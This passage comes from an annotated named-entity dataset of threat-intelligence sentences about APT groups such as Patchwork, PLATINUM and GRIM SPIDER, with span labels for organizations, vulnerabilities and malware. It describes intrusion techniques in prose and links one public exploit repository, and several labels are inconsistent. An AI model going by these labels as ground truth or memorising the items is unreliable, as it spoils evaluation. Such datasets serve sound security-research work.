the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia .", "spans": {"Organization: 360 Threat Intelligence Center": [[120, 150]], "Organization: Trend Micro": [[198, 209]]}, "info": {"id": "dnrti_valid_000026", "source": "dnrti_valid"}} {"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages .", "spans": {"Organization: Volexity": [[0, 8]]}, "info": {"id": "dnrti_valid_000027", "source": "dnrti_valid"}} {"text": "The newsletter includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest .", "spans": {}, "info": {"id": "dnrti_valid_000028", "source": "dnrti_valid"}} {"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 .", "spans": {}, "info": {"id": "dnrti_valid_000030", "source": "dnrti_valid"}} {"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools .", "spans": {}, "info": {"id": "dnrti_valid_000031", "source": "dnrti_valid"}} {"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks .", "spans": {"Organization: Volexity": [[29, 37]]}, "info": {"id": "dnrti_valid_000036", "source": "dnrti_valid"}} {"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials .", "spans": {}, "info": {"id": 
"dnrti_valid_000037", "source": "dnrti_valid"}} {"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf .", "spans": {}, "info": {"id": "dnrti_valid_000038", "source": "dnrti_valid"}} {"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 .", "spans": {}, "info": {"id": "dnrti_valid_000039", "source": "dnrti_valid"}} {"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent .", "spans": {"Organization: Unit 42": [[25, 32]]}, "info": {"id": "dnrti_valid_000040", "source": "dnrti_valid"}} {"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"Vulnerability: CVE-2017-0261": [[49, 62]], "Vulnerability: CVE-2015-2545": [[196, 209]]}, "info": {"id": "dnrti_valid_000043", "source": "dnrti_valid"}} {"text": "The Patchwork group continues to plague victims located within the Indian subcontinent .", "spans": {}, "info": {"id": "dnrti_valid_000044", "source": "dnrti_valid"}} {"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia .", "spans": {"Organization: government agencies": [[98, 117]]}, "info": {"id": "dnrti_valid_000045", "source": "dnrti_valid"}} {"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 .", "spans": {}, "info": {"id": "dnrti_valid_000046", "source": "dnrti_valid"}} {"text": "The use of weaponized legitimate documents is 
a longstanding operational standard of Patchwork .", "spans": {}, "info": {"id": "dnrti_valid_000047", "source": "dnrti_valid"}} {"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable .", "spans": {}, "info": {"id": "dnrti_valid_000048", "source": "dnrti_valid"}} {"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents .", "spans": {}, "info": {"id": "dnrti_valid_000049", "source": "dnrti_valid"}} {"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group .", "spans": {}, "info": {"id": "dnrti_valid_000050", "source": "dnrti_valid"}} {"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group .", "spans": {}, "info": {"id": "dnrti_valid_000051", "source": "dnrti_valid"}} {"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers .", "spans": {}, "info": {"id": "dnrti_valid_000052", "source": "dnrti_valid"}} {"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign .", "spans": {}, "info": {"id": "dnrti_valid_000053", "source": "dnrti_valid"}} {"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 .", "spans": {}, "info": {"id": "dnrti_valid_000054", "source": "dnrti_valid"}} {"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware .", "spans": {}, "info": {"id": 
"dnrti_valid_000055", "source": "dnrti_valid"}} {"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons .", "spans": {}, "info": {"id": "dnrti_valid_000056", "source": "dnrti_valid"}} {"text": "PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": {"Vulnerability: CVE-2014-1761": [[26, 39]]}, "info": {"id": "dnrti_valid_000060", "source": "dnrti_valid"}} {"text": "\" PittyTiger \" is a mutex used by the malware .", "spans": {}, "info": {"id": "dnrti_valid_000061", "source": "dnrti_valid"}} {"text": "This RAT is the origin of the attackers ' group name .", "spans": {}, "info": {"id": "dnrti_valid_000062", "source": "dnrti_valid"}} {"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group .", "spans": {}, "info": {"id": "dnrti_valid_000063", "source": "dnrti_valid"}} {"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains .", "spans": {}, "info": {"id": "dnrti_valid_000064", "source": "dnrti_valid"}} {"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT .", "spans": {}, "info": {"id": "dnrti_valid_000065", "source": "dnrti_valid"}} {"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 .", "spans": {}, "info": {"id": "dnrti_valid_000066", "source": "dnrti_valid"}} {"text": "We have been monitoring the activities of this group and believe they are operating from China .", "spans": {}, "info": {"id": "dnrti_valid_000067", "source": "dnrti_valid"}} {"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections .", "spans": {}, "info": {"id": "dnrti_valid_000069", "source": 
"dnrti_valid"}} {"text": "Backdoor.APT.PittyTiger – This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 .", "spans": {}, "info": {"id": "dnrti_valid_000070", "source": "dnrti_valid"}} {"text": "It also appears the attackers use this as second-stage malware .", "spans": {}, "info": {"id": "dnrti_valid_000072", "source": "dnrti_valid"}} {"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment .", "spans": {}, "info": {"id": "dnrti_valid_000074", "source": "dnrti_valid"}} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets .", "spans": {}, "info": {"id": "dnrti_valid_000075", "source": "dnrti_valid"}} {"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior .", "spans": {}, "info": {"id": "dnrti_valid_000076", "source": "dnrti_valid"}} {"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM .", "spans": {"Organization: Microsoft": [[114, 123]]}, "info": {"id": "dnrti_valid_000077", "source": "dnrti_valid"}} {"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia .", "spans": {"Organization: governmental organizations": [[185, 211]], "Organization: defense institutes": [[214, 232]], "Organization: intelligence agencies": [[235, 256]], "Organization: diplomatic institutions": [[259, 282]], "Organization: telecommunication 
providers": [[289, 316]]}, "info": {"id": "dnrti_valid_000078", "source": "dnrti_valid"}} {"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once .", "spans": {}, "info": {"id": "dnrti_valid_000081", "source": "dnrti_valid"}} {"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network .", "spans": {}, "info": {"id": "dnrti_valid_000082", "source": "dnrti_valid"}} {"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected .", "spans": {}, "info": {"id": "dnrti_valid_000083", "source": "dnrti_valid"}} {"text": "PLATINUM primarily targets its intended victims using spear phishing .", "spans": {}, "info": {"id": "dnrti_valid_000084", "source": "dnrti_valid"}} {"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic .", "spans": {}, "info": {"id": "dnrti_valid_000085", "source": "dnrti_valid"}} {"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages .", "spans": {}, "info": {"id": "dnrti_valid_000086", "source": "dnrti_valid"}} {"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": {"Vulnerability: zero-day exploits": [[43, 60]]}, "info": {"id": "dnrti_valid_000087", "source": "dnrti_valid"}} {"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , 
with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once .", "spans": {}, "info": {"id": "dnrti_valid_000088", "source": "dnrti_valid"}} {"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000089", "source": "dnrti_valid"}} {"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"Vulnerability: CVE-2015-2545": [[153, 166]]}, "info": {"id": "dnrti_valid_000091", "source": "dnrti_valid"}} {"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message .", "spans": {"Malware: malicious document": [[46, 64]]}, "info": {"id": "dnrti_valid_000092", "source": "dnrti_valid"}} {"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": {"Vulnerability: CVE-2015-2546": [[72, 85]]}, "info": {"id": "dnrti_valid_000093", "source": "dnrti_valid"}} {"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"Vulnerability: CVE-2015-2545": [[147, 160]]}, "info": {"id": "dnrti_valid_000094", "source": "dnrti_valid"}} {"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an 
ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves .", "spans": {"Vulnerability: zero-day exploits": [[37, 54], [289, 306], [358, 375]]}, "info": {"id": "dnrti_valid_000095", "source": "dnrti_valid"}} {"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"Organization: Microsoft": [[57, 66]], "Organization: users": [[117, 122]]}, "info": {"id": "dnrti_valid_000096", "source": "dnrti_valid"}} {"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack .", "spans": {}, "info": {"id": "dnrti_valid_000097", "source": "dnrti_valid"}} {"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network .", "spans": {}, "info": {"id": "dnrti_valid_000098", "source": "dnrti_valid"}} {"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers .", "spans": {}, "info": {"id": "dnrti_valid_000099", "source": "dnrti_valid"}} {"text": "This section describes some of the tools used by the group .", "spans": {}, "info": {"id": "dnrti_valid_000100", "source": "dnrti_valid"}} {"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations .", "spans": {}, "info": {"id": "dnrti_valid_000101", "source": "dnrti_valid"}} {"text": "In addition to Dipsind and its 
variants , PLATINUM uses a few other families of custom-built backdoors within its attack toolset .", "spans": {}, "info": {"id": "dnrti_valid_000102", "source": "dnrti_valid"}} {"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments .", "spans": {}, "info": {"id": "dnrti_valid_000103", "source": "dnrti_valid"}} {"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets .", "spans": {}, "info": {"id": "dnrti_valid_000104", "source": "dnrti_valid"}} {"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors .", "spans": {}, "info": {"id": "dnrti_valid_000105", "source": "dnrti_valid"}} {"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz .", "spans": {}, "info": {"id": "dnrti_valid_000106", "source": "dnrti_valid"}} {"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching .", "spans": {}, "info": {"id": "dnrti_valid_000107", "source": "dnrti_valid"}} {"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques .", "spans": {}, "info": {"id": "dnrti_valid_000108", "source": "dnrti_valid"}} {"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process .", "spans": {}, "info": {"id": "dnrti_valid_000110", "source": "dnrti_valid"}} {"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM .", 
"spans": {}, "info": {"id": "dnrti_valid_000111", "source": "dnrti_valid"}} {"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names .", "spans": {"Organization: Microsoft": [[76, 85]]}, "info": {"id": "dnrti_valid_000112", "source": "dnrti_valid"}} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation .", "spans": {}, "info": {"id": "dnrti_valid_000113", "source": "dnrti_valid"}} {"text": "PLATINUM has used several zero-day exploits against their victims .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]]}, "info": {"id": "dnrti_valid_000114", "source": "dnrti_valid"}} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 .", "spans": {}, "info": {"id": "dnrti_valid_000115", "source": "dnrti_valid"}} {"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia .", "spans": {}, "info": {"id": "dnrti_valid_000116", "source": "dnrti_valid"}} {"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources .", "spans": {}, "info": {"id": "dnrti_valid_000117", "source": "dnrti_valid"}} {"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking .", "spans": {}, "info": {"id": "dnrti_valid_000118", "source": "dnrti_valid"}} {"text": "Take advantage of native mitigations built into Windows 10 .", "spans": {}, "info": {"id": "dnrti_valid_000119", "source": "dnrti_valid"}} {"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful 
on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed .", "spans": {}, "info": {"id": "dnrti_valid_000120", "source": "dnrti_valid"}} {"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": {"Vulnerability: CVE-2015-2546": [[8, 21]]}, "info": {"id": "dnrti_valid_000121", "source": "dnrti_valid"}} {"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": {"Vulnerability: zero-day vulnerability": [[18, 40]], "Vulnerability: CVE-2015-2545": [[51, 64]]}, "info": {"id": "dnrti_valid_000122", "source": "dnrti_valid"}} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel® Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication .", "spans": {"Organization: Microsoft": [[29, 38]]}, "info": {"id": "dnrti_valid_000123", "source": "dnrti_valid"}} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication .", "spans": {"Organization: Microsoft": [[29, 38]]}, "info": {"id": "dnrti_valid_000124", "source": "dnrti_valid"}} {"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication .", "spans": {}, "info": {"id": "dnrti_valid_000125", "source": "dnrti_valid"}} {"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications .", 
"spans": {}, "info": {"id": "dnrti_valid_000126", "source": "dnrti_valid"}} {"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse .", "spans": {}, "info": {"id": "dnrti_valid_000127", "source": "dnrti_valid"}} {"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia—PLATINUM is known to customize tools based on the network architecture of targeted organizations .", "spans": {}, "info": {"id": "dnrti_valid_000128", "source": "dnrti_valid"}} {"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks .", "spans": {}, "info": {"id": "dnrti_valid_000129", "source": "dnrti_valid"}} {"text": "Another possibility is that the targeted systems did not have AMT provisioned and PLATINUM , once they've obtained administrative privileges on the system , proceeded to provision AMT .", "spans": {}, "info": {"id": "dnrti_valid_000130", "source": "dnrti_valid"}} {"text": "During the provisioning process , PLATINUM could select whichever username and password they wish .", "spans": {}, "info": {"id": "dnrti_valid_000131", "source": "dnrti_valid"}} {"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way .", "spans": {}, "info": {"id": "dnrti_valid_000133", "source": "dnrti_valid"}} {"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel® Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools .", "spans": {"Organization: Microsoft": [[0, 9]]}, "info": {"id": "dnrti_valid_000134", "source": "dnrti_valid"}} {"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into 
suspicious activities transpiring on their networks .", "spans": {"Organization: Windows Defender ATP": [[114, 134]]}, "info": {"id": "dnrti_valid_000135", "source": "dnrti_valid"}} {"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": {"Vulnerability: zero-day exploits": [[131, 148]]}, "info": {"id": "dnrti_valid_000136", "source": "dnrti_valid"}} {"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework .", "spans": {}, "info": {"id": "dnrti_valid_000137", "source": "dnrti_valid"}} {"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor .", "spans": {}, "info": {"id": "dnrti_valid_000138", "source": "dnrti_valid"}} {"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools .", "spans": {}, "info": {"id": "dnrti_valid_000139", "source": "dnrti_valid"}} {"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea .", "spans": {}, "info": {"id": "dnrti_valid_000140", "source": "dnrti_valid"}} {"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 .", "spans": {}, "info": {"id": "dnrti_valid_000141", "source": "dnrti_valid"}} {"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s .", "spans": {}, "info": {"id": "dnrti_valid_000142", "source": 
"dnrti_valid"}} {"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"Organization: executives": [[188, 198]]}, "info": {"id": "dnrti_valid_000143", "source": "dnrti_valid"}} {"text": "PROMETHIUM is an activity group that has been active as early as 2012 .", "spans": {}, "info": {"id": "dnrti_valid_000144", "source": "dnrti_valid"}} {"text": "This malware family is known as \" PittyTiger \" by the anti-virus community .", "spans": {"Organization: anti-virus community": [[54, 74]]}, "info": {"id": "dnrti_valid_000145", "source": "dnrti_valid"}} {"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": {"Organization: Microsoft": [[83, 92]]}, "info": {"id": "dnrti_valid_000146", "source": "dnrti_valid"}} {"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: intelligence agencies": [[328, 349]]}, "info": {"id": "dnrti_valid_000147", "source": "dnrti_valid"}} {"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers .", "spans": {}, "info": {"id": "dnrti_valid_000148", "source": "dnrti_valid"}} {"text": "PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": {}, "info": {"id": "dnrti_valid_000149", "source": "dnrti_valid"}} 
{"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": {"Vulnerability: CVE-2016-4117": [[101, 114]]}, "info": {"id": "dnrti_valid_000150", "source": "dnrti_valid"}} {"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal .", "spans": {}, "info": {"id": "dnrti_valid_000151", "source": "dnrti_valid"}} {"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family .", "spans": {"Organization: Microsoft": [[26, 35]]}, "info": {"id": "dnrti_valid_000152", "source": "dnrti_valid"}} {"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China .", "spans": {}, "info": {"id": "dnrti_valid_000153", "source": "dnrti_valid"}} {"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 .", "spans": {"Organization: CrowdStrike": [[4, 15]]}, "info": {"id": "dnrti_valid_000154", "source": "dnrti_valid"}} {"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 .", "spans": {"Organization: CrowdStrike Intelligence": [[4, 28]]}, "info": {"id": "dnrti_valid_000155", "source": "dnrti_valid"}} {"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries .", "spans": {}, "info": {"id": "dnrti_valid_000156", "source": "dnrti_valid"}} {"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both 
by CrowdStrike , and in open source , where they are referred to as the MSUpdater group .", "spans": {"Organization: CrowdStrike": [[91, 102]]}, "info": {"id": "dnrti_valid_000157", "source": "dnrti_valid"}} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries .", "spans": {"Organization: Technology sectors": [[144, 162]]}, "info": {"id": "dnrti_valid_000158", "source": "dnrti_valid"}} {"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {}, "info": {"id": "dnrti_valid_000159", "source": "dnrti_valid"}} {"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code .", "spans": {}, "info": {"id": "dnrti_valid_000160", "source": "dnrti_valid"}} {"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions .", "spans": {"Organization: antivirus companies": [[10, 29]]}, "info": {"id": "dnrti_valid_000161", "source": "dnrti_valid"}} {"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 .", "spans": {}, "info": {"id": "dnrti_valid_000162", "source": "dnrti_valid"}} {"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace .", "spans": {}, "info": {"id": "dnrti_valid_000163", "source": "dnrti_valid"}} {"text": "But according to Gnosticplayers , his foray into a public 
marketplace like Dream has two goals --besides the first and obvious one being money .", "spans": {}, "info": {"id": "dnrti_valid_000164", "source": "dnrti_valid"}} {"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware .", "spans": {"Organization: Secureworks": [[18, 29]], "Organization: CTU": [[80, 83]]}, "info": {"id": "dnrti_valid_000165", "source": "dnrti_valid"}} {"text": "Some sources claimed that GOLD LOWELL operations specifically targeted the healthcare vertical following public SamSam incidents in 2016 and 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000166", "source": "dnrti_valid"}} {"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft .", "spans": {"Organization: CTU": [[10, 13]]}, "info": {"id": "dnrti_valid_000167", "source": "dnrti_valid"}} {"text": "In January 2017 , GOLD LOWELL began targeting legitimate RDP account credentials , in some cases discovering and compromising accounts using brute-force techniques .", "spans": {}, "info": {"id": "dnrti_valid_000168", "source": "dnrti_valid"}} {"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool .", "spans": {}, "info": {"id": "dnrti_valid_000169", "source": "dnrti_valid"}} {"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing .", "spans": {}, "info": {"id": "dnrti_valid_000170", "source": "dnrti_valid"}} {"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality .", "spans": {}, "info": {"id": 
"dnrti_valid_000171", "source": "dnrti_valid"}} {"text": "Gold Lowell then provide a download link to a unique XML executable file and corresponding RSA private key to decrypt the files .", "spans": {}, "info": {"id": "dnrti_valid_000172", "source": "dnrti_valid"}} {"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell .", "spans": {}, "info": {"id": "dnrti_valid_000173", "source": "dnrti_valid"}} {"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past .", "spans": {}, "info": {"id": "dnrti_valid_000174", "source": "dnrti_valid"}} {"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments .", "spans": {}, "info": {"id": "dnrti_valid_000175", "source": "dnrti_valid"}} {"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release .", "spans": {}, "info": {"id": "dnrti_valid_000176", "source": "dnrti_valid"}} {"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors .", "spans": {}, "info": {"id": "dnrti_valid_000177", "source": "dnrti_valid"}} {"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments .", "spans": {}, "info": {"id": "dnrti_valid_000178", "source": "dnrti_valid"}} {"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD .", "spans": {}, "info": {"id": "dnrti_valid_000179", "source": "dnrti_valid"}} {"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 .", "spans": {}, 
"info": {"id": "dnrti_valid_000180", "source": "dnrti_valid"}} {"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository .", "spans": {}, "info": {"id": "dnrti_valid_000181", "source": "dnrti_valid"}} {"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks .", "spans": {}, "info": {"id": "dnrti_valid_000182", "source": "dnrti_valid"}} {"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files .", "spans": {}, "info": {"id": "dnrti_valid_000183", "source": "dnrti_valid"}} {"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type .", "spans": {}, "info": {"id": "dnrti_valid_000184", "source": "dnrti_valid"}} {"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable .", "spans": {}, "info": {"id": "dnrti_valid_000185", "source": "dnrti_valid"}} {"text": "Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA ( activities of which have been public reported as part of the \" Lazarus Group \" ) , because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000186", "source": "dnrti_valid"}} {"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000188", "source": "dnrti_valid"}} {"text": "Based on these factors , there is considerably more evidence supporting the hypothesis that the GRIM SPIDER threat actors are Russian speakers and not North Korean .", "spans": {}, "info": {"id": 